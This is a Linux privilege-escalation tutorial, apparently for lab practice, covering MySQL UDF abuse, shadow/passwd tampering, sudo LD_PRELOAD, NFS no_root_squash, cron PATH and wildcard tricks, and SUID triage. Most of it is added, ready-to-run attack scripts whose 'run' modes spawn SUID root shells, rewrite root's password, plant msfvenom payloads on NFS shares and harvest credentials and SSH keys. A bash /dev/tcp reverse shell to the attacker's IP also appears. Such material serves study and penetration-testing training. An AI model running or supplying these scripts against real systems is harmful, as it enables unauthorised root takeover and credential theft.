Linux Privilege Escalation
Overview of the different Linux Privilege Escalation chapters in this article
- Mysql 4.x/5.0 (Linux) – User-Defined Function (UDF)
- Weak File Permissions – Readable /etc/shadow
- Weak File Permissions – Writeable /etc/shadow
- Weak File Permissions – Writeable /etc/passwd
- Sudo – Shell Escape Sequences
- Sudo – Environment Variables
- Cron Jobs – File Permissions
- Cron Jobs – PATH Environment Variable
- Cron Jobs – Wildcards
- SUID / SGID Executables – Known Exploits
- Password & Keys – Config Files
- Password & Keys – History Files
- Password & Keys – SSH Keys
- NFS
- Kernel Exploits
MySQL 4.x/5.0 (Linux) – User-Defined Function (UDF)
Let’s start this article with an „oldie but goldie“ among Linux privilege escalations.
If the MySQL service runs as root and the database „root“ account has no password assigned, a popular exploit (raptor_udf2.c) abuses User Defined Functions (UDFs) to run system commands as root via the MySQL service. The usage notes from the exploit’s header follow; the last step is typed in a normal shell after leaving the MySQL client. Two caveats for newer servers: since MySQL 5.1 the shared object must be written into the server’s plugin directory (select @@plugin_dir) rather than /usr/lib, and a non-empty secure_file_priv setting restricts or disables load_file() and INTO DUMPFILE.
Usage:
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
$ mysql -u root
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system | 2   | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
$ /tmp/rootbash -p
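The following script is an added example and is not part of the original article or of raptor_udf2.c. It checks the three preconditions the technique depends on (mysqld runs as root, the database root account has no password, secure_file_priv does not block file access) and generates the installation SQL with the library placed in the server’s plugin directory instead of the fixed /usr/lib path. The library path /home/raptor/raptor_udf2.so and the mysql/ps invocations in the live part are assumptions; the functions themselves work on text so they can be tested without a database.

```shell
#!/bin/sh
# Added example, not part of the original article nor of raptor_udf2.c:
# preflight checks for the UDF technique and the SQL that installs the
# function with the library in the server's plugin directory (required
# since MySQL 5.1). Assumptions: the compiled library is
# /home/raptor/raptor_udf2.so and the mysql client logs in as root
# without a password.

# Print the account mysqld (or mariadbd) runs as, reading `ps -eo user,comm`
# output on stdin so the function can be tested against a constructed sample.
mysqld_user() {
    awk '$2 == "mysqld" || $2 == "mariadbd" { print $1; exit }'
}

# Return 0 if secure_file_priv (value in $1) lets load_file()/INTO DUMPFILE
# touch the path in $2: empty means unrestricted, NULL disables file access
# entirely, any other value is the only directory the server will use.
file_ops_allowed() {
    priv="$1"; path="$2"
    [ -z "$priv" ] && return 0
    [ "$priv" = "NULL" ] && return 1
    case "$path" in
        "${priv%/}"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Emit the installation SQL for library $1, plugin directory $2 and command $3.
udf_sql() {
    so="$1"; plugin_dir="${2%/}"; cmd="$3"
    cat <<EOF
use mysql;
create table foo(line blob);
insert into foo values(load_file('$so'));
select * from foo into dumpfile '$plugin_dir/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('$cmd');
EOF
}

# Live run, only when asked for explicitly, so the functions above can be
# exercised without a database present.
if [ "${1:-}" = "run" ]; then
    svc=$(ps -eo user,comm | mysqld_user)
    [ "$svc" = "root" ] || { echo "mysqld runs as '${svc:-<not running>}', not root"; exit 1; }
    mysql -u root -e 'select 1' >/dev/null 2>&1 || { echo "root login without password failed"; exit 1; }
    plugin_dir=$(mysql -u root -N -e 'select @@plugin_dir')
    priv=$(mysql -u root -N -e 'select ifnull(@@secure_file_priv, "NULL")' 2>/dev/null)
    file_ops_allowed "$priv" "$plugin_dir/raptor_udf2.so" ||
        { echo "secure_file_priv='$priv' blocks writing into $plugin_dir"; exit 1; }
    udf_sql /home/raptor/raptor_udf2.so "$plugin_dir" \
        'cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash' | mysql -u root
    /tmp/rootbash -p
fi
```

Run it as `sh udf-preflight.sh run` on the target. If the mysqld process belongs to the mysql user rather than root, the UDF still executes commands, but only as that user, which is why the first check is the decisive one.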
Weak File Permissions – Readable /etc/shadow
In /etc/shadow every line represents one user. A user’s password hash, if they have one, sits between the first and second colon of the line. The file is normally readable only by root (mode 640, group shadow); if your user can read it, the hashes can be taken offline for cracking.
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
We can try to crack the hash with John the Ripper. Save the hash in a file called root-hash.txt and start the cracking process with the command
john --wordlist=/usr/share/wordlists/rockyou.txt root-hash.txt
(on Kali the wordlist directory is /usr/share/wordlists). To log in as root with the recovered password, use su root.
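As an added example (not from the original article), the helper below extracts a user’s hash from a readable shadow file and names the hash type from its prefix, so the right john or hashcat mode is chosen before cracking starts. The sample line is the root entry shown above; the paths in the live part are assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: pull one user's hash out of
# shadow-formatted input and classify it by its crypt(3) prefix.

# Constructed sample: the root entry quoted in the article.
SAMPLE='root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::'

# Print field 2 (the hash) of user $1 from shadow lines on stdin.
shadow_hash() {
    awk -F: -v u="$1" '$1 == u { print $2; exit }'
}

# Map a hash prefix to "name hashcat-mode" ("-" where hashcat has no mode).
hash_type() {
    case "$1" in
        '$1$'*)            echo "md5crypt 500" ;;
        '$2'[aby]'$'*)     echo "bcrypt 3200" ;;
        '$5$'*)            echo "sha256crypt 7400" ;;
        '$6$'*)            echo "sha512crypt 1800" ;;
        '$y$'*|'$7$'*)     echo "yescrypt -" ;;        # john jumbo only
        ''|'!'|'*'|'!!')   echo "locked-or-empty -" ;; # nothing to crack
        '!'*)              echo "locked -" ;;          # hash kept, login disabled
        *)                 echo "unknown -" ;;
    esac
}

# Write "user:hash" for every account that actually has a hash, so john
# reports cracked passwords together with the user name.
crackable_entries() {
    awk -F: '$2 ~ /^\$/ { print $1 ":" $2 }'
}

if [ "${1:-}" = "run" ]; then
    crackable_entries < /etc/shadow > shadow-hashes.txt
    john --wordlist=/usr/share/wordlists/rockyou.txt shadow-hashes.txt
    john --show shadow-hashes.txt
fi
```

For the sample line the classifier reports sha512crypt, i.e. john’s sha512crypt format and hashcat mode 1800; accounts with `*` or `!` in the hash field are skipped because there is nothing to crack.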
Weak File Permissions – Writeable /etc/shadow
If /etc/shadow is writable by our non-root user, we can create a new password hash with the command
mkpasswd -m sha-512 <newpassword>
(mkpasswd is part of the whois package on Debian-based systems). Make a backup copy of the file first, then replace the existing root hash with the generated one and log in with su root and your new password.
Weak File Permissions – Writeable /etc/passwd
The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.
Generate a new password hash with a password of your choice (newer OpenSSL versions also accept -6 for a SHA-512 hash):
openssl passwd <newpassword>
Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user’s row (replacing the „x“). A field that is not „x“ makes the system check the password against /etc/passwd instead of /etc/shadow, so root now has the chosen password.
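The helper below is an added example, not from the original article, and serves both the writable /etc/shadow and the writable /etc/passwd case: it rewrites the password field of one user in a passwd- or shadow-formatted file and writes through the existing file so that its owner and mode survive (a mv of a temp file would replace the inode and can change both). The target file, user name and password are assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: replace a user's password
# field in a passwd- or shadow-formatted file without changing the file's
# ownership or mode. Paths, user and password are assumptions.

# SHA-512 crypt hash via openssl (OpenSSL 1.1.1 or later); mkpasswd -m sha-512
# from the whois package produces the same format.
make_hash() {
    openssl passwd -6 "$1"
}

# Rewrite field 2 of the line whose field 1 equals $2 in file $1 with hash $3.
# Everything else in the file is left untouched.
set_password_field() {
    file="$1"; user="$2"; hash="$3"
    tmp=$(mktemp) || return 1
    awk -F: -v OFS=: -v u="$user" -v h="$hash" '$1 == u { $2 = h } { print }' "$file" > "$tmp" || return 1
    cat "$tmp" > "$file"      # write through the existing inode: owner/mode stay
    rm -f "$tmp"
}

# Print the current password field of user $2 in file $1 (verification).
password_field() {
    awk -F: -v u="$2" '$1 == u { print $2; exit }' "$1"
}

if [ "${1:-}" = "run" ]; then
    target="${2:-/etc/passwd}"            # or /etc/shadow when that is the writable one
    cp "$target" "/tmp/$(basename "$target").bak"   # keep a copy to restore from
    set_password_field "$target" root "$(make_hash 'NewPass123')"
    password_field "$target" root
    su root
fi
```

Run `sh setpw.sh run /etc/passwd` or `sh setpw.sh run /etc/shadow` depending on which file is writable, then `su root` with the chosen password. Restore the backup once you are done so the system is left as it was found.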
Sudo – Shell Escape Sequences
List the programs your user may run through sudo with the command
sudo -l
Look the program names up on GTFOBins (https://gtfobins.github.io). If a program is listed with a „sudo“ function, it can be used to elevate privileges, usually via an escape sequence (for example spawning a shell from inside an editor, pager or find’s -exec).
Sudo – Environment Variables
Sudo can be configured to inherit certain environment variables from the user’s environment.
Check which environment variables are inherited (look for the env_keep options):
sudo -l
If LD_PRELOAD and LD_LIBRARY_PATH appear in env_keep, both are passed through from the user’s environment to the program run by sudo. LD_PRELOAD loads a shared object before any others when a program starts, so a library whose initialisation routine calls setuid(0) and spawns a shell runs as root before the program itself does anything. LD_LIBRARY_PATH provides a list of directories that are searched first for shared libraries, so a malicious copy of a library the program depends on can be planted there.
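The script below is an added example, not from the original article. It parses `sudo -l` output for the two things the last two sections rely on, the env_keep variables and the allowed commands (with their base names for the GTFOBins lookup), and, when LD_PRELOAD is kept, builds the classic preload library and runs an allowed command through sudo with it. The `sudo -l` sample is constructed, and /tmp/preload.so and /usr/bin/find are assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: parse `sudo -l` output and,
# if LD_PRELOAD survives env_reset, build and use the preload library.
# The sample output is constructed; paths are assumptions.

SAMPLE_SUDO_L='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH, secure_path=/usr/local/sbin:/usr/bin

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/sbin/apache2 -f /etc/apache2/apache2.conf
    (ALL : ALL) ALL'

# Variable names from env_keep=... and env_keep+=... entries, one per line
# (quoted, space-separated lists such as env_keep+="A B" are split too).
sudo_env_keep() {
    tr ',' '\n' | sed -n 's/^[[:space:]]*env_keep+\{0,1\}=\(.*\)$/\1/p' \
        | tr -d '"' | tr ' ' '\n' | sed '/^$/d'
}

# Commands from the "(runas) [TAG:] command" lines, one per line.
sudo_commands() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\([A-Z_]*:[[:space:]]*\)*\(.*\)$/\2/p'
}

# Base names of those commands: the names to look up on GTFOBins.
sudo_binary_names() {
    sudo_commands | awk '{ print $1 }' | sed 's#.*/##'
}

# Write and compile the preload library: its init routine runs as root
# before the sudo'ed program's main(), drops the variable so the spawned
# shell is not re-injected, and execs bash with the effective uid kept.
build_preload_so() {
    out="$1"
    cat > "${out%.so}.c" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

void _init(void) {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
EOF
    gcc -fPIC -shared -nostartfiles -o "$out" "${out%.so}.c"
}

if [ "${1:-}" = "run" ]; then
    out=$(sudo -l)
    if printf '%s\n' "$out" | sudo_env_keep | grep -qx LD_PRELOAD; then
        build_preload_so /tmp/preload.so
        cmd=$(printf '%s\n' "$out" | sudo_commands | awk '$1 ~ /^\// { print $1; exit }')
        sudo LD_PRELOAD=/tmp/preload.so "$cmd"
    else
        printf 'No LD_PRELOAD in env_keep; try these on GTFOBins:\n'
        printf '%s\n' "$out" | sudo_binary_names
    fi
fi
```

Any allowed command works as the carrier because the library runs before the program’s own code; if only LD_LIBRARY_PATH is kept, the same idea applies by compiling the payload as a replacement for a library the program loads and pointing LD_LIBRARY_PATH at its directory.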
Password & Keys – Config Files
Config files often contain passwords in plaintext or other reversible formats. Search configuration and application directories (for example /etc, /var/www, /opt and the home directories) for strings such as password, passwd, secret and key.
Password & Keys – History Files
If a user accidentally types their password on the command line instead of into a password prompt, it may get recorded in a history file.
View the contents of all the hidden history files in the user’s home directory with the following command
cat ~/.*history | less
Password & Keys – SSH Keys
Sometimes users make backups of important files but fail to secure them with the correct permissions. Look for hidden files and directories in the system root with the following command
ls -la /
If you are lucky and find a private SSH key, copy it to your machine and restrict its permissions; ssh refuses keys that are readable by other users
chmod 600 ssh_key
To log in with the key, use the following command
ssh -i ssh_key root@<ip>
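One scan covering the three „Password & Keys“ sections, as an added example that is not part of the original article: credential assignments in config files, passwords typed on the command line in history files, and private SSH keys anywhere under a directory. The search patterns are my own heuristics and the sample files in the test are constructed; directory paths are assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: hunt for credentials in
# config files, shell history and loose private keys. Patterns are
# heuristics; the directories are assumptions.

# Lines under $1 that look like a credential assignment (key = value or
# key: value). -I skips binaries; /proc and /sys are never worth reading.
config_credentials() {
    grep -rEIn --exclude-dir=proc --exclude-dir=sys \
        '(passw(or)?d|secret|api[_-]?key|token)[[:space:]]*[=:][[:space:]]*[^[:space:]]' "$1" 2>/dev/null
}

# History entries in home directory $1 that carry a password on the command
# line: -pSecret style options, --password, sshpass, user:pass@host URLs.
history_credentials() {
    cat "$1"/.*history 2>/dev/null \
        | grep -En '(-p[^[:space:]-]|--password[= ]|sshpass|://[^/[:space:]]+:[^/[:space:]]+@|passw(or)?d=)'
}

# Files under $1 that contain a private key header; unreadable ones are skipped.
private_keys() {
    grep -rlE --exclude-dir=proc --exclude-dir=sys -- \
        '-----BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----' "$1" 2>/dev/null
}

# Copy a found key to $2 with the mode ssh insists on.
use_key() {
    cp "$1" "$2" && chmod 600 "$2"
}

if [ "${1:-}" = "run" ]; then
    for dir in /etc /var/www /opt; do config_credentials "$dir"; done
    for home in /home/* /root; do history_credentials "$home"; done
    private_keys /
fi
```

Expect false positives from the config scan (prompt strings, documentation); the history and key scans are usually precise. A key found for root is tried with `ssh -i <key> root@<ip>` as described above, and a key without a matching public key can still be matched to a user by comparing `ssh-keygen -y -f <key>` against the authorized_keys files you can read.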
NFS
Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the „nobody“ user.
Check the NFS share configuration on the victim machine with
cat /etc/exports
(from your own machine, showmount -e <ip> lists the exported shares). If you find a share that has root squashing disabled (no_root_squash), become root on your own machine with su root, create a mount point and mount the NFS share with the following commands
mkdir /mnt/nfs
mount -o rw,vers=2 <ip>:/<disabled root squashing share> /mnt/nfs
If the server refuses NFSv2, use vers=3 or leave the option out. Still on your own machine, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash with -p, so bash keeps the effective root UID)
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /mnt/nfs/shell.elf
Also on your own machine, make the file executable and set the SUID permission; because root squashing is off, the file is owned by root on the server
chmod +xs /mnt/nfs/shell.elf
Now switch back to the victim machine as the low-privileged user and execute the file from the exported path, /<disabled root squashing share>/shell.elf, and you are presented with a root shell.
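As an added example (not from the original article), the script below finds the export entries that disable root squashing and then performs the mount and payload steps described above from the attacking machine. The /etc/exports sample is constructed; the target address, mount point and payload location are assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: find no_root_squash exports
# and plant a SUID root shell on one. Sample exports are constructed;
# target, mount point and payload paths are assumptions.

SAMPLE_EXPORTS='# /etc/exports
/srv/backups   *(rw,sync,no_root_squash,no_subtree_check)
/home          10.0.0.0/8(rw,sync,root_squash) 192.168.1.5(rw,no_root_squash)
/tmp           *(rw,sync)'

# Print "path client" for every client entry carrying no_root_squash.
# Entries without it inherit root_squash, the server default, so /tmp above
# is not reported even though it is writable.
no_root_squash_exports() {
    awk '!/^[[:space:]]*#/ && NF >= 2 {
        for (i = 2; i <= NF; i++)
            if (index($i, "no_root_squash")) { split($i, c, "("); print $1, c[1] }
    }'
}

# As root on the attacking box: mount share $2 of host $1 at $3 and drop a
# SUID shell on it. NFSv3 is tried first because many servers no longer
# offer v2. A static msfvenom payload avoids a libc mismatch with the target.
plant_suid_shell() {
    target="$1"; share="$2"; mnt="${3:-/mnt/nfs}"
    mkdir -p "$mnt"
    mount -t nfs -o rw,vers=3 "$target:$share" "$mnt" 2>/dev/null ||
        mount -t nfs -o rw,vers=2 "$target:$share" "$mnt" || return 1
    msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o "$mnt/shell.elf"
    chmod +xs "$mnt/shell.elf"
    ls -l "$mnt/shell.elf"     # expect root-owned, -rwsr-sr-x
}

if [ "${1:-}" = "run" ]; then
    target="$2"
    showmount -e "$target"
    # Taken from the victim's /etc/exports when it is readable, otherwise
    # pick a share from the showmount output by hand.
    share=$(no_root_squash_exports < /etc/exports | awk 'NR == 1 { print $1 }')
    plant_suid_shell "$target" "$share" /mnt/nfs
fi
```

Note the client column: a share can squash root for most networks and still disable it for a single address, so the entry matching the attacking host is the one that counts. Run `/<share>/shell.elf` on the victim as the low-privileged user afterwards.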
Kernel Exploits
Kernel exploits can leave the system in an unstable state, which is why they should only be run as a last resort.
To identify candidate kernel vulnerabilities you can use the popular Linux Exploit Suggester 2, a Perl script that compares the running kernel version (uname -r) against a list of known exploits; verify the distribution and kernel build by hand before running any of them.
Cron Jobs – File Permissions
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab; further system jobs live in /etc/cron.d/ and the /etc/cron.hourly, daily, weekly and monthly directories. View the content with the command
cat /etc/crontab
Check the permissions of every script the jobs call. If you find one that is world-writable, replace its content with a bash reverse shell pointing to your machine (keep the file executable):
#!/bin/bash
bash -i >& /dev/tcp/<your ip>/4444 0>&1
Set up a netcat listener on your Kali box with nc -nvlp 4444 and wait for the cron job to run (should not take longer than a minute). A root shell connects back to your netcat listener.
Cron Jobs – PATH Environment Variable
If a cron job calls its command without an absolute path, the PATH variable set in the crontab decides where cron looks for it, and you can abuse that.
cat /etc/crontab
In the lab used here the PATH variable starts with /home/user, our user’s home directory, so a file of the same name there is found before the real script. Create a file in your home directory with exactly the name the cron job calls (for example overwrite.sh) and the following contents; the script copies bash and sets the SUID bit on the copy:
#!/bin/bash
cp /bin/bash /tmp/bash
chmod +xs /tmp/bash
Make sure that the file is executable:
chmod +x /home/user/<name of the cronjob file>
Wait for the cron job to run. Then start the /tmp/bash copy with -p, so that bash keeps the effective root UID instead of dropping it, and you get a shell running with root privileges:
/tmp/bash -p
Cron Jobs – Wildcards
If you find a cron job that calls tar with a wildcard, like this
tar czf /tmp/backup.tar.gz *
the shell expands the * into the file names in the working directory, so files named like tar options (for example --checkpoint=1 and --checkpoint-action=exec=sh shell.sh) are handed to tar as options. GTFOBins has an entry for this; it can be used to run other commands, such as a reverse shell, as the user the cron job runs as.
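The script below is an added example, not from the original article, and covers the three cron sections in one pass: it lists the jobs in a system crontab, flags scripts that are world-writable, flags commands given without a path (together with the crontab’s PATH, whose first writable directory is the one to plant in), and flags jobs or scripts that run tar and friends on a bare wildcard. It also stages the payload for the PATH and wildcard cases. The crontab text is a constructed sample and every file path is an assumption.

```shell
#!/bin/sh
# Added example, not from the original article: triage a system crontab for
# world-writable scripts, relative commands and wildcard tar jobs, and stage
# the matching payloads. Crontab text is constructed; paths are assumptions.

SAMPLE_CRONTAB='SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
@reboot   root /usr/bin/backup.sh'

# The PATH cron hands to its jobs, from the crontab's own PATH= line.
cron_path() {
    sed -n 's/^PATH=//p'
}

# "user<TAB>command" for every job line, 5-field or @shortcut form, skipping
# comments, blank lines and variable assignments.
cron_jobs() {
    awk '/^[[:space:]]*(#|$)/ || /^[A-Za-z_]+=/ { next }
         { if ($1 ~ /^@/) { u = $2; f = 3 } else { u = $6; f = 7 }
           cmd = $f; for (i = f + 1; i <= NF; i++) cmd = cmd " " $i
           print u "\t" cmd }'
}

# Jobs whose command has no slash (cd excluded): cron resolves the name via
# PATH, so a same-named file in a writable leading PATH directory wins.
cron_relative_commands() {
    awk -F'\t' '{ split($2, w, " ")
                  if (w[1] !~ /\// && w[1] != "cd") print $1 "\t" w[1] }'
}

# Jobs whose script is world-writable, judged by the mode bits (ls -l column 9)
# rather than test -w, so the result is the same whether or not you are root.
cron_world_writable_scripts() {
    while IFS="$(printf '\t')" read -r user cmd; do
        set -f; set -- $cmd; set +f
        if [ -f "$1" ] && [ "$(ls -l "$1" | cut -c9)" = "w" ]; then
            printf '%s\t%s\n' "$user" "$1"
        fi
    done
}

# Jobs (or the readable scripts they call) running tar/rsync/chown/chmod on a bare *.
cron_wildcard_commands() {
    while IFS="$(printf '\t')" read -r user cmd; do
        set -f; set -- $cmd; set +f
        body="$cmd"
        if [ -r "$1" ]; then body="$body
$(cat "$1")"; fi
        if printf '%s\n' "$body" | grep -Eq '(^|[;&| ])(tar|rsync|chown|chmod)[^;&|]* \*([[:space:]]|$)'; then
            printf '%s\t%s\n' "$user" "$1"
        fi
    done
}

# PATH case: a script named $2 in writable PATH directory $1 that copies bash
# and sets SUID on the copy, so /tmp/bash -p gives a root shell afterwards.
plant_path_payload() {
    printf '#!/bin/sh\ncp /bin/bash /tmp/bash && chmod +xs /tmp/bash\n' > "$1/$2"
    chmod +x "$1/$2"
}

# Wildcard case: in the directory $1 that the job tars, add the payload and
# two file names that tar parses as options; the next run executes privesc.sh.
stage_tar_wildcard() {
    plant_path_payload "$1" privesc.sh
    touch "$1/--checkpoint=1" "$1/--checkpoint-action=exec=sh privesc.sh"
}

if [ "${1:-}" = "run" ]; then
    echo "PATH: $(cron_path < /etc/crontab)"
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | cron_jobs > /tmp/jobs.txt
    echo "--- relative commands";  cron_relative_commands      < /tmp/jobs.txt
    echo "--- world-writable";     cron_world_writable_scripts < /tmp/jobs.txt
    echo "--- wildcard";           cron_wildcard_commands      < /tmp/jobs.txt
fi
```

For the sample, the relative job is overwrite.sh and the first PATH entry is /home/user, so `plant_path_payload /home/user overwrite.sh` is the move; for a wildcard job, `stage_tar_wildcard` is run in the directory the job archives (the tar option files must sit where the * expands, not where the script lives).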
SUID / SGID Executables – Known Exploits
To find all the SUID/SGID executables on the victim machine, run the following command; then look the unusual ones up on GTFOBins (SUID function) and in exploit databases
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
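As an added example, not from the original article, the helper below triages the output of that find command by separating the SUID/SGID binaries a stock Debian or Ubuntu install ships from the ones worth a closer look, and by noting who owns each one (only a root-owned SUID file gives root). The KNOWN_SUID list is my own judgement call, not an authoritative list, and the ls -l sample is constructed.

```shell
#!/bin/sh
# Added example, not from the original article: triage SUID/SGID findings.
# KNOWN_SUID is a judgement call, not an authoritative list; the sample
# ls -l output is constructed.

KNOWN_SUID='passwd chsh chfn gpasswd newgrp su sudo mount umount ping ping6
fusermount fusermount3 pkexec polkit-agent-helper-1 dbus-daemon-launch-helper
ssh-keysign chage expiry unix_chkpwd at crontab wall write ssh-agent mtr-packet'

SAMPLE_LS='-rwsr-xr-x 1 root root 68208 Jan 1 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 31032 Jan 1 2020 /usr/bin/find
-rwsr-sr-x 1 root root 12345 Jan 1 2020 /usr/local/bin/suid-env
-rwxr-sr-x 1 root tty 9999 Jan 1 2020 /usr/bin/wall
-rwsr-xr-x 1 user user 4444 Jan 1 2020 /home/user/tool'

# Read ls -l lines on stdin and print the path of every binary whose base
# name is not in KNOWN_SUID (paths containing spaces are not handled).
unusual_suid() {
    awk -v known=" $(printf '%s' "$KNOWN_SUID" | tr '\n' ' ') " '{
        n = split($NF, parts, "/")
        if (index(known, " " parts[n] " ") == 0) print $NF
    }'
}

# "path owner suid|nosuid" per line: the setuid bit is column 4 of the mode
# string (s, or S when the owner execute bit is missing); SGID-only files
# only give you the group, and a user-owned SUID file only that user.
suid_owner() {
    awk '{ s = substr($1, 4, 1) ~ /[sS]/ ? "suid" : "nosuid"; print $NF, $3, s }'
}

# The enumeration from the article, restricted to regular files.
list_suid_sgid() {
    find / -type f \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
}

if [ "${1:-}" = "run" ]; then
    list_suid_sgid | tee /tmp/suid.txt | unusual_suid
    suid_owner < /tmp/suid.txt | grep ' root suid$'
fi
```

The unusual list for the sample is /usr/bin/find, /usr/local/bin/suid-env and /home/user/tool; find has a GTFOBins SUID entry (`find . -exec /bin/sh -p \; -quit`), whereas the user-owned tool would only ever give that user’s privileges.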